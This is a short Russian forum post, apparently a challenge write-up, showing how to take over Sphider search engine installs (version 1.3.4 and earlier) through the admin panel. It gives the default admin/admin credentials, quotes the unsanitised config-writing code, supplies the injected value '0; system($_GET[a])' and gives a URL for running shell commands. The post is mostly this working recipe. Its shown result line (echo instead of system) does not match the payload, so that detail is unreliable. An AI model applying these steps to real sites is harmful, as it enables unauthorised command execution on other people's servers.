Powered by <=1.3.4 В Задании 003, где требовалось залить шелл был обнаружен этот движок. роспознал я его сразу, так как у самого когда то стоял такой. Сразу же полез на локалхост посмотреть сорцы. Оказалось что довольно просто залить шелл из админки. Логин и пасс хранять не в зашифрованом виде в http://site.com/sphider/admin/auth.php Дефолт: PHP: error_reporting(E_ERROR | E_PARSE); $admin = "admin"; $admin_pw = "admin"; Собственно заливка шелла Уязвимый код: PHP: if ($_index_pdf=="") { $_index_pdf=0; } ... fwrite($fhandle, "\n\n// Index pdf files\n"); fwrite($fhandle,"$"."index_pdf = ".$_index_pdf. ";"); Удобнее это делать в опере. Идем в сорс и меняем это: HTML: <input name="_index_pdf" type="checkbox" value="0" id="index_pdf" > на это: HTML: <input name="_index_pdf" type="checkbox" value="0; system($_GET[a])" id="index_pdf" > Сохраняем настройки. В итоге имеем: PHP: // Index pdf files $index_pdf = 0; echo($_GET[a]); http://site.com/sphider/settings/conf.php?a=ls -la По иронии судьбы на том сайте что в задании прав на запись не хватало. Также в админке есть xss. Но пользы мало, так как мы уже в админке).
